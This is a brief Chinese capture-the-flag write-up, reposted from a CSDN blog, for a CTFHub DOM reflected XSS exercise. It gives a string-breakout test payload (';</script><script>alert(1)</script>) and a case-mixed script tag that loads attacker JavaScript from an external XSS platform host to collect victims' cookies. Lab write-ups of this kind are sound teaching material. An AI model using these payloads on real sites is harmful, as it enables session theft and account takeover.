0


CTFHub技能树web——XSS——DOM反射

根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式

然后去网页测试一下alert(1)反射

';</script><script>alert(1)</script>

看到 确实存在 去xssaq.cn

创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中

';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>

标签: xss 前端

本文转载自: https://blog.csdn.net/qq_48368964/article/details/140881295
版权归原作者 A 八方 所有, 如有侵权,请联系我们删除。

“CTFHub技能树web——XSS——DOM反射”的评论:

还没有评论